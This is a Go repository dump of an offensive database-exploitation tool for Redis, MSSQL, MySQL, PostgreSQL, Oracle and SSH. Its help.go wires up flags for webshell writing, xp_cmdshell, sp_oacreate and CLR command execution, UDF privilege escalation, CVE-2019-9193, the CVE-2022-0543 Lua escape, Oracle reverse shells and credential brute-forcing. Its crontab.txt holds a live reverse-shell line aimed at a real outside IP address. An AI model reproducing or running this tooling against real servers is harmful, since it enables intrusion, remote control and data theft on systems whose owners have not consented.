├── .gitattributes
├── crontab.txt
├── driver
    └── instantclient_21_8.zip
├── exp.dll
├── exp.so
├── go.mod
├── go.sum
├── main.go
├── out.json
├── pac
    ├── help.go
    ├── logger.go
    ├── mssql_CLR.go
    ├── mssql_cmd.go
    ├── mssql_connect.go
    ├── mssql_spoacreate.go
    ├── mssql_webshell.go
    ├── mssql_xpcmdshell.go
    ├── mysql_cmd.go
    ├── mysql_connect.go
    ├── mysql_udf.go
    ├── mysql_webshell.go
    ├── oracl_xmlquery.go
    ├── oracle_cmd.go
    ├── oracle_connect.go
    ├── oracle_export_extension.go
    ├── oracle_funcall.go
    ├── other.go
    ├── postgre_cmd.go
    ├── postgre_connect.go
    ├── postgre_cve_2019_9193.go
    ├── postgre_fileread.go
    ├── postgre_write.go
    ├── redis_cmd.go
    ├── redis_connect.go
    ├── redis_export.go
    ├── redis_getshell.go
    ├── redis_lua.go
    ├── redis_slave.go
    ├── redis_string.go
    ├── redis_tcp.go
    └── ssh_connect.go
├── readme.md
├── shell.txt
├── shell
    ├── shell.asp
    ├── shell.aspx
    ├── shell.jsp
    └── shell.php
└── ssh.txt


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/crontab.txt:
--------------------------------------------------------------------------------
1 | */1 * * * * bash -i >& /dev/tcp/175.178.233.198/8881 0>&1


--------------------------------------------------------------------------------
/driver/instantclient_21_8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/driver/instantclient_21_8.zip


--------------------------------------------------------------------------------
/exp.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/exp.dll


--------------------------------------------------------------------------------
/exp.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AduraK2/Databasetools/ffb28b8552583b9015f07da2073bf8e728018475/exp.so


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
 1 | module Databasetools
 2 | 
 3 | go 1.19
 4 | 
 5 | require (
 6 | 	github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5
 7 | 	github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394
 8 | 	github.com/denisenkom/go-mssqldb v0.12.3
 9 | 	github.com/go-redis/redis/v8 v8.11.5
10 | 	github.com/go-sql-driver/mysql v1.7.0
11 | 	github.com/godror/godror v0.36.0
12 | 	github.com/lib/pq v1.10.7
13 | 	golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d
14 | 	golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2
15 | )
16 | 
17 | require (
18 | 	github.com/cespare/xxhash/v2 v2.1.2 // indirect
19 | 	github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f // indirect
20 | 	github.com/go-logfmt/logfmt v0.5.1 // indirect
21 | 	github.com/go-logr/logr v1.2.3 // indirect
22 | 	github.com/godror/knownpb v0.1.0 // indirect
23 | 	github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe // indirect
24 | 	github.com/golang-sql/sqlexp v0.1.0 // indirect
25 | 	golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e // indirect
26 | 	golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 // indirect
27 | 	google.golang.org/protobuf v1.28.1 // indirect
28 | )
29 | 


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
 1 | github.com/Azure/azure-sdk-for-go/sdk/azcore v0.19.0/go.mod h1:h6H6c8enJmmocHUbLiiGY6sx7f9i+X3m1CHdd5c6Rdw=
 2 | github.com/Azure/azure-sdk-for-go/sdk/azidentity v0.11.0/go.mod h1:HcM1YX14R7CJcghJGOYCgdezslRSVzqwLf/q+4Y2r/0=
 3 | github.com/Azure/azure-sdk-for-go/sdk/internal v0.7.0/go.mod h1:yqy467j36fJxcRV2TzfVZ1pCb5vxm4BtZPUdYWe/Xo8=
 4 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5 h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
 5 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5/go.mod h1:wHh0iHkYZB8zMSxRWpUBQtwG5a7fFgvEO+odwuTv2gs=
 6 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394 h1:OYA+5W64v3OgClL+IrOD63t4i/RW7RqrAVl9LTZ9UqQ=
 7 | github.com/axgle/mahonia v0.0.0-20180208002826-3358181d7394/go.mod h1:Q8n74mJTIgjX4RBBcHnJ05h//6/k6foqmgE45jTQtxg=
 8 | github.com/cespare/xxhash/v2 v2.1.2 h1:YRXhKfTDauu4ajMg1TPgFO5jnlC2HCbmLXMcTG5cbYE=
 9 | github.com/cespare/xxhash/v2 v2.1.2/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
10 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
11 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
12 | github.com/denisenkom/go-mssqldb v0.12.3 h1:pBSGx9Tq67pBOTLmxNuirNTeB8Vjmf886Kx+8Y+8shw=
13 | github.com/denisenkom/go-mssqldb v0.12.3/go.mod h1:k0mtMFOnU+AihqFxPMiF05rtiDrorD1Vrm1KEz5hxDo=
14 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78=
15 | github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc=
16 | github.com/dnaeon/go-vcr v1.2.0/go.mod h1:R4UdLID7HZT3taECzJs4YgbbH6PIGXB6W/sc5OLb6RQ=
17 | github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4=
18 | github.com/go-logfmt/logfmt v0.5.1 h1:otpy5pqBCBZ1ng9RQ0dPu4PN7ba75Y/aA+UpowDyNVA=
19 | github.com/go-logfmt/logfmt v0.5.1/go.mod h1:WYhtIu8zTZfxdn5+rREduYbwxfcBr/Vr6KEVveWlfTs=
20 | github.com/go-logr/logr v1.2.3 h1:2DntVwHkVopvECVRSlL5PSo9eG+cAkDCuckLubN+rq0=
21 | github.com/go-logr/logr v1.2.3/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
22 | github.com/go-redis/redis/v8 v8.11.5 h1:AcZZR7igkdvfVmQTPnu9WE37LRrO/YrBH5zWyjDC0oI=
23 | github.com/go-redis/redis/v8 v8.11.5/go.mod h1:gREzHqY1hg6oD9ngVRbLStwAWKhA0FEgq8Jd4h5lpwo=
24 | github.com/go-sql-driver/mysql v1.7.0 h1:ueSltNNllEqE3qcWBTD0iQd3IpL/6U+mJxLkazJ7YPc=
25 | github.com/go-sql-driver/mysql v1.7.0/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI=
26 | github.com/godror/godror v0.36.0 h1:4kymETiaTOJcyF5+47JSUs44Pi0R9bTwsWtBTWqAVRs=
27 | github.com/godror/godror v0.36.0/go.mod h1:jW1+pN+z/V0h28p9XZXVNtEvfZP/2EBfaSjKJLp3E4g=
28 | github.com/godror/knownpb v0.1.0 h1:dJPK8s/I3PQzGGaGcUStL2zIaaICNzKKAK8BzP1uLio=
29 | github.com/godror/knownpb v0.1.0/go.mod h1:4nRFbQo1dDuwKnblRXDxrfCFYeT4hjg3GjMqef58eRE=
30 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
31 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
32 | github.com/golang-sql/sqlexp v0.1.0 h1:ZCD6MBpcuOVfGVqsEmY5/4FtYiKz6tSyUv9LPEDei6A=
33 | github.com/golang-sql/sqlexp v0.1.0/go.mod h1:J4ad9Vo8ZCWQ2GMrC4UCQy1JpCbwU9m3EOqtpKwwwHI=
34 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
35 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
36 | github.com/google/go-cmp v0.5.8 h1:e6P7q2lk1O+qJJb4BtCQXlK8vWEO8V1ZeuEdJNOqZyg=
37 | github.com/lib/pq v1.10.7 h1:p7ZhMD+KsSRozJr34udlUrhboJwWAgCg34+/ZZNvZZw=
38 | github.com/lib/pq v1.10.7/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
39 | github.com/modocache/gover v0.0.0-20171022184752-b58185e213c5/go.mod h1:caMODM3PzxT8aQXRPkAt8xlV/e7d7w8GM5g0fa5F0D8=
40 | github.com/nxadm/tail v1.4.8 h1:nPr65rt6Y5JFSKQO7qToXr7pePgD6Gwiw05lkbyAQTE=
41 | github.com/oklog/ulid/v2 v2.0.2 h1:r4fFzBm+bv0wNKNh5eXTwU7i85y5x+uwkxCUTNVQqLc=
42 | github.com/onsi/ginkgo v1.16.5 h1:8xi0RTUf59SOSfEtZMvwTvXYMzG4gV23XVHOZiXNtnE=
43 | github.com/onsi/gomega v1.18.1 h1:M1GfJqGRrBrrGGsbxzV5dqM2U2ApXefZCQpkukxYRLE=
44 | github.com/pkg/browser v0.0.0-20180916011732-0a3d74bf9ce4/go.mod h1:4OwLy04Bl9Ef3GJJCoec+30X3LQs/0/m4HFRt/2LUSA=
45 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
46 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
47 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
48 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
49 | golang.org/x/crypto v0.0.0-20201016220609-9e8e0b390897/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
50 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d h1:sK3txAijHtOK88l68nt020reeT1ZdKLIYetKl95FzVY=
51 | golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
52 | golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
53 | golang.org/x/net v0.0.0-20210610132358-84b48f89b13b/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
54 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2 h1:CIJ76btIcR3eFI5EgSo6k1qKw9KJexJuRLI9G7Hp5wE=
55 | golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
56 | golang.org/x/sync v0.0.0-20220513210516-0976fa681c29 h1:w8s32wxx3sY+OjLlv9qltkLU5yvJzxjjgiHWLjdIcw4=
57 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
58 | golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
59 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
60 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
61 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
62 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e h1:fLOSk5Q00efkSvAm+4xcoXD+RRmLmmulPn5I3Y9F2EM=
63 | golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
64 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1 h1:v+OssWQX+hTHEmOBgwxdZxK4zHq3yOs8F9J7mk0PY8E=
65 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
66 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
67 | golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M=
68 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
69 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
70 | golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
71 | google.golang.org/protobuf v1.26.0-rc.1/go.mod h1:jlhhOSvTdKEhbULTjvd4ARK9grFBp09yW+WbY/TyQbw=
72 | google.golang.org/protobuf v1.28.1 h1:d0NfwRgPtno5B1Wa6L2DAG+KivqkdutMf1UhdNx175w=
73 | google.golang.org/protobuf v1.28.1/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I=
74 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
75 | gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ=
76 | gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI=
77 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY=
78 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ=
79 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
80 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
81 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"Databasetools/pac"
 5 | )
 6 | 
 7 | func main() {
 8 | 	pac.Help()
 9 | }
10 | 


--------------------------------------------------------------------------------
/out.json:
--------------------------------------------------------------------------------
1 | {"string":null,"hash":null,"set":null,"list":null,"zset":null}


--------------------------------------------------------------------------------
/pac/help.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"database/sql"
  5 | 	"flag"
  6 | 	"fmt"
  7 | 	"strings"
  8 | )
  9 | 
 10 | var (
 11 | 	// 连接状态
 12 | 	conn *sql.DB
 13 | 	sign bool
 14 | 
 15 | 	// redis
 16 | 	Ruser string
 17 | 	Rhost string
 18 | 	Rport string
 19 | 	Lhost string
 20 | 	Lport string
 21 | 	PWD   string
 22 | 
 23 | 	dump_   bool
 24 | 	import_ bool
 25 | 	shell   bool
 26 | 	crontab bool
 27 | 	sshkey  bool
 28 | 	lua     bool
 29 | 	exec    bool
 30 | 
 31 | 	console bool
 32 | 	cli     bool
 33 | 	del     bool
 34 | 
 35 | 	Redis bool
 36 | 
 37 | 	dll string
 38 | 	CMD string
 39 | 
 40 | 	DoCMD bool
 41 | 
 42 | 	cmd string
 43 | 
 44 | 	// mssql
 45 | 	MSsql    bool
 46 | 	isXP     bool
 47 | 	isSP     bool
 48 | 	isCLR    bool
 49 | 	console2 bool
 50 | 	logshell bool
 51 | 	difshell bool
 52 | 	path     string
 53 | 	e        string
 54 | 
 55 | 	// SSH
 56 | 	SSH bool
 57 | 
 58 | 	// Mysql
 59 | 	Mysql            bool
 60 | 	IntoOutFileShell bool
 61 | 	LogShell         bool
 62 | 	UDF              bool
 63 | 
 64 | 	// Postgre
 65 | 	Postgre     bool
 66 | 	CVE20199193 bool
 67 | 	file        string
 68 | 	Read1       bool
 69 | 	Read2       bool
 70 | 	list        bool
 71 | 	uploadPath  string
 72 | 	Write       bool
 73 | 	Webshell    string
 74 | 
 75 | 	// Oracle
 76 | 	Oracle                   bool
 77 | 	sid                      string
 78 | 	dbms_export_extension    bool
 79 | 	dbms_xmlquery_newcontext bool
 80 | 	Funcall                  bool
 81 | 	reverse                  bool
 82 | 
 83 | 	// Crack
 84 | 	Crack bool
 85 | 	m     string
 86 | )
 87 | 
 88 | func init() {
 89 | 	flag.StringVar(&Rhost, "rhost", "", "目标 IP")
 90 | 	flag.StringVar(&Rport, "rport", "6379", "目标端口")
 91 | 	flag.StringVar(&Lhost, "lhost", "", "vps")
 92 | 	flag.StringVar(&Lport, "lport", "", "监听端口")
 93 | 	flag.StringVar(&PWD, "pwd", "", "数据库密码")
 94 | 	flag.BoolVar(&cli, "cli", false, "连接数据库shell")
 95 | 	flag.BoolVar(&DoCMD, "docmd", false, "出现该参数表示要执行单条命令")
 96 | 	flag.StringVar(&cmd, "cmd", "", "执行单条命令")
 97 | 	flag.BoolVar(&del, "del", false, "卸载命令执行函数")
 98 | 
 99 | 	flag.BoolVar(&Redis, "redis", false, "存在该参数表示连接redis数据库")
100 | 
101 | 	flag.BoolVar(&dump_, "dump", false, "导出 Redis 数据")
102 | 	flag.BoolVar(&import_, "import", false, "导入 Redis 数据")
103 | 	flag.BoolVar(&exec, "exec", false, "主从复制-命令执行")
104 | 	flag.BoolVar(&shell, "shell", false, "写 Webshell (需要知道物理路径)")
105 | 	flag.BoolVar(&crontab, "crontab", false, "Linux 定时任务反弹 Shell (适用于centos，ubuntu可能不行)")
106 | 	flag.BoolVar(&sshkey, "sshkey", false, "Linux写 SSH 公钥 (先生成ssh公钥)")
107 | 	flag.BoolVar(&lua, "lua", false, "Lua沙盒绕过命令执行 CVE-2022-0543")
108 | 	flag.BoolVar(&console, "console", false, "使用交互式 shell")
109 | 
110 | 	flag.StringVar(&dll, "so", "exp.dll", "设置 exp.dll | exp.so")
111 | 
112 | 	//mssql
113 | 	flag.BoolVar(&MSsql, "mssql", false, "存在该参数表示连接mssql数据库")
114 | 	//mssql xpcmdshell
115 | 	flag.BoolVar(&isXP, "isxp", false, "判断是否存在xp_cmdshell,存在则开启")
116 | 	//mssql sp_oacreate
117 | 	flag.BoolVar(&isSP, "issp", false, "判断是否存在sp_oacreate,存在则开启")
118 | 	// mssql CLR
119 | 	flag.BoolVar(&isCLR, "isclr", false, "开启clr")
120 | 	flag.BoolVar(&console2, "console2", false, "sp_oacreate使用exec直接回显")
121 | 	// getshell
122 | 	flag.BoolVar(&logshell, "logshell", false, "通过日志备份getshell")
123 | 	flag.BoolVar(&difshell, "difshell", false, "通过差异备份getshell")
124 | 	flag.StringVar(&path, "path", "", "网站物理路径")
125 | 	flag.StringVar(&e, "e", "", "webshell脚本类型")
126 | 
127 | 	// SSH
128 | 	flag.BoolVar(&SSH, "ssh", false, "ssh连接")
129 | 	flag.StringVar(&Ruser, "ruser", "root", "目标主机用户名")
130 | 
131 | 	// Mysql
132 | 	flag.BoolVar(&Mysql, "mysql", false, "Mysql数据库")
133 | 	flag.BoolVar(&IntoOutFileShell, "outfileshell", false, "通过into outfile写入webshell")
134 | 	flag.BoolVar(&LogShell, "generallog", false, "通过修改日志存储位置getshell")
135 | 	flag.BoolVar(&UDF, "udf", false, "udf提权")
136 | 
137 | 	// postgre
138 | 	flag.BoolVar(&Postgre, "postgre", false, "Postgre数据库")
139 | 	flag.BoolVar(&CVE20199193, "CVE20199193", false, "CVE-2019-9193提权")
140 | 	flag.StringVar(&file, "file", "", "需要读取的文件名称")
141 | 	flag.BoolVar(&Read1, "read1", false, "创建数据表存储读取内容")
142 | 	flag.BoolVar(&Read2, "read2", false, "利用postgresql大对象来处理读文件")
143 | 	flag.BoolVar(&list, "list", false, "列目录")
144 | 	flag.BoolVar(&Write, "write", false, "上传文件")
145 | 	flag.StringVar(&uploadPath, "uploadpath", "", "Webshell上传的路径")
146 | 
147 | 	// Oracle
148 | 	flag.BoolVar(&Oracle, "oracle", false, "选择oracle数据库")
149 | 	flag.StringVar(&sid, "sid", "", "Oracle数据库名")
150 | 	flag.BoolVar(&dbms_export_extension, "dee", false, "使用dbms_export_extension注入漏洞执行命令")
151 | 	flag.BoolVar(&reverse, "re", false, "使用dbms_export_extension注入漏洞反弹shell")
152 | 	flag.BoolVar(&dbms_xmlquery_newcontext, "dx", false, "使用dbms_xmlquery_newcontext执行命令(dbms_export_extension存在漏洞前提下)")
153 | 	flag.BoolVar(&Funcall, "fc", false, "使用dbms_java_test.funcall()反弹shell")
154 | 
155 | 	// Crack
156 | 	flag.BoolVar(&Crack, "crack", false, "爆破参数")
157 | 	flag.StringVar(&m, "m", "", "爆破的数据库类型")
158 | 
159 | }
160 | 
161 | func Help() {
162 | 	flag.Parse()
163 | 	if Redis {
164 | 		err := RedisClient(PWD)
165 | 		if err != nil {
166 | 			if strings.Contains(err.Error(), "context deadline exceeded") {
167 | 				Info("Redis 连接超时")
168 | 			}
169 | 			if strings.Contains(err.Error(), "NOAUTH Authentication required.") {
170 | 				Info("Redis 需要密码认证")
171 | 			}
172 | 			if strings.Contains(err.Error(), "ERR invalid password") {
173 | 				Info("Redis 认证密码错误!")
174 | 			}
175 | 			return
176 | 		}
177 | 		switch {
178 | 		case exec:
179 | 			if Lhost == "" {
180 | 				Info("缺少Lhost参数")
181 | 			}
182 | 			if console {
183 | 				RedisSlave()
184 | 				loopCmd("exec")
185 | 			} else {
186 | 				RedisSlave()
187 | 				RunCmd(CMD)
188 | 				CloseSlave("exec")
189 | 			}
190 | 		case dump_:
191 | 			handle_export()
192 | 		case import_:
193 | 			handle_import()
194 | 		case cli:
195 | 			loopRedis()
196 | 		case shell:
197 | 			echo("getshell", "./shell.txt")
198 | 		case crontab:
199 | 			echo("crontab", "./crontab.txt")
200 | 		case sshkey:
201 | 			echo("ssh", "./ssh.txt")
202 | 		case lua:
203 | 			if console {
204 | 				loopCmd("lua")
205 | 			} else {
206 | 				if CMD == "" {
207 | 					Info("缺少 cmd 参数, 无法执行命令哦")
208 | 					return
209 | 				}
210 | 				RedisLua(CMD)
211 | 			}
212 | 		}
213 | 	} else if MSsql {
214 | 		_, conn, _ := MssqlConnect(Rhost, Rport, Ruser, PWD)
215 | 		MssqlCMD("select @@version;", conn)
216 | 		Success("连接成功!")
217 | 		switch {
218 | 		case cli:
219 | 			loopMssqlCMD(conn)
220 | 		// xp_cmdshell
221 | 		case isXP:
222 | 			if console {
223 | 				MssqlCMDConsole(conn)
224 | 			} else if DoCMD {
225 | 				MssqlCMDone(cmd, conn)
226 | 			} else {
227 | 				MssqlXpcmdshell(conn)
228 | 			}
229 | 			// sp_oacreate
230 | 		case isSP:
231 | 			if console {
232 | 				CMDconsole_Spoacreate(conn)
233 | 			} else if console2 {
234 | 				CMDconsole_Spoacreate_two(conn)
235 | 			} else if DoCMD {
236 | 				CMDone_Spoacreate(cmd, conn)
237 | 			} else {
238 | 				OpenSpoacreate(conn)
239 | 				//Getresult(table, conn)
240 | 			}
241 | 		// CLR
242 | 		case isCLR:
243 | 			if console {
244 | 				CMDconsole_CLR(conn)
245 | 			} else if DoCMD {
246 | 				CMDone_CLR(cmd, conn)
247 | 			} else if del {
248 | 				DeleteWarSQLKit(conn)
249 | 			} else {
250 | 				MssqlCLR(conn)
251 | 			}
252 | 			// getshell
253 | 		case logshell:
254 | 			// Webshell_choice(conn)
255 | 			Choice("1", conn, e)
256 | 		case difshell:
257 | 			Choice("2", conn, e)
258 | 		default:
259 | 			Info("无功能参数，默认输出")
260 | 		}
261 | 	} else if SSH {
262 | 		SSHConnect(Ruser, Rhost, PWD)
263 | 	} else if Mysql {
264 | 		err, conn, _ := MysqlConnect(Ruser, Rhost, PWD, Rport)
265 | 		m, err := MysqlCMD("select @@version;", conn)
266 | 		fmt.Printf("数据库版本：Mysql %v\n", m[0]["@@version"])
267 | 		if err != nil {
268 | 			Info("连接错误")
269 | 			Err(err)
270 | 		}
271 | 		switch {
272 | 		case cli:
273 | 			loopMysqlCMD(conn)
274 | 		case shell:
275 | 			if IntoOutFileShell {
276 | 				Webshell_IntoOutFile(conn, path)
277 | 			} else if LogShell {
278 | 				Webshell_logshell(conn, path)
279 | 			}
280 | 		case UDF:
281 | 			UdfPrivilege(conn)
282 | 		}
283 | 	} else if Postgre {
284 | 		conn, _ := postgre_connect(Rhost, Rport, Ruser, PWD)
285 | 		result, err := postgrecmd("select version();", conn)
286 | 		if err != nil {
287 | 			Err(err)
288 | 		}
289 | 		Info(fmt.Sprintf("数据库版本：%s", result[0]["version"]))
290 | 		postgreisdba(conn)
291 | 		switch {
292 | 		case cli:
293 | 			loopPostgreCMD(conn)
294 | 		case CVE20199193:
295 | 			if console {
296 | 				cve_2019_9193_console(conn)
297 | 			} else {
298 | 				cve_2019_9193_cmd(cmd, conn)
299 | 			}
300 | 		case Read1:
301 | 			if console {
302 | 				loopPostgreFileRead(conn)
303 | 			} else {
304 | 				PostgreFileRead(conn, file)
305 | 			}
306 | 		case Read2:
307 | 			if console {
308 | 				loopPostgreFileReadhex(conn)
309 | 			} else {
310 | 				PostgreFileReadhex(conn, file)
311 | 			}
312 | 		case list:
313 | 			if console {
314 | 				loopPostgreListDirectoy(conn)
315 | 			} else {
316 | 				PostgreListDirectoy(conn, file)
317 | 			}
318 | 		case Write:
319 | 			WriteFile(conn, uploadPath, e)
320 | 		}
321 | 	} else if Oracle {
322 | 		conn, err, _ := OracleConnect(Ruser, PWD, Rhost, Rport, sid)
323 | 		if err != nil {
324 | 			Err(err)
325 | 		}
326 | 		resultSet, err := OracleCMD(fmt.Sprintf("select version from v$instance"), conn)
327 | 		for _, m := range resultSet {
328 | 			for _, value := range m {
329 | 				Info(fmt.Sprintf("当前数据库版本为：%s", value))
330 | 			}
331 | 		}
332 | 		isdba, err := OracleCMD("select userenv('ISDBA') from dual", conn)
333 | 		for _, m := range isdba {
334 | 			for _, value := range m {
335 | 				fmt.Println(fmt.Sprintf("%s", value))
336 | 				if strings.ToLower(fmt.Sprintf("%s", value)) == "true" {
337 | 					Success("当前账号为DBA权限")
338 | 				} else {
339 | 					Info("当前账号非DBA权限")
340 | 				}
341 | 			}
342 | 		}
343 | 		switch {
344 | 		case cli:
345 | 			loopOracleCMD(conn)
346 | 		case dbms_export_extension:
347 | 			if console {
348 | 				OracleExportExtensionConsole(conn)
349 | 			} else if DoCMD {
350 | 				OracleExportExtensionCMD(cmd, conn)
351 | 			} else if reverse {
352 | 				OracleExportExtensionReverse(conn, Lhost, Lport)
353 | 			}
354 | 		case del:
355 | 			DropFucnction(conn)
356 | 		case dbms_xmlquery_newcontext:
357 | 			if console {
358 | 				OracleXMLQueryConsole(conn)
359 | 			} else if DoCMD {
360 | 				OracleXMLQueryCMD(cmd, conn)
361 | 			}
362 | 		case Funcall:
363 | 			OracleFuncCallReverse(conn, Lhost, Lport)
364 | 		}
365 | 	} else if Crack {
366 | 		if m == "mysql" {
367 | 			MysqlCrack(Rhost, Rport)
368 | 		} else if m == "mssql" {
369 | 			MssqlCrack(Rhost, Rport)
370 | 		} else if m == "postgresql" {
371 | 			PostgreCrack(Rhost, Rport)
372 | 		} else if m == "redis" {
373 | 			ReddisCrack()
374 | 		} else if m == "oracle" {
375 | 			OracleCrack(Rhost, Rport)
376 | 		}
377 | 	}
378 | }
379 | 


--------------------------------------------------------------------------------
/pac/logger.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"log"
 5 | )
 6 | 
 7 | const (
 8 | 	pINFO    = "[*] "
 9 | 	pSUCCESS = "[+] "
10 | 	pErr     = "[-] "
11 | )
12 | 
13 | func Info(format string) {
14 | 	log.Println(pINFO, format)
15 | }
16 | 
17 | func Err(format error) {
18 | 	log.Println(pErr, format)
19 | }
20 | 
21 | func Success(format interface{}) {
22 | 	log.Println(pSUCCESS, format)
23 | }
24 | 


--------------------------------------------------------------------------------
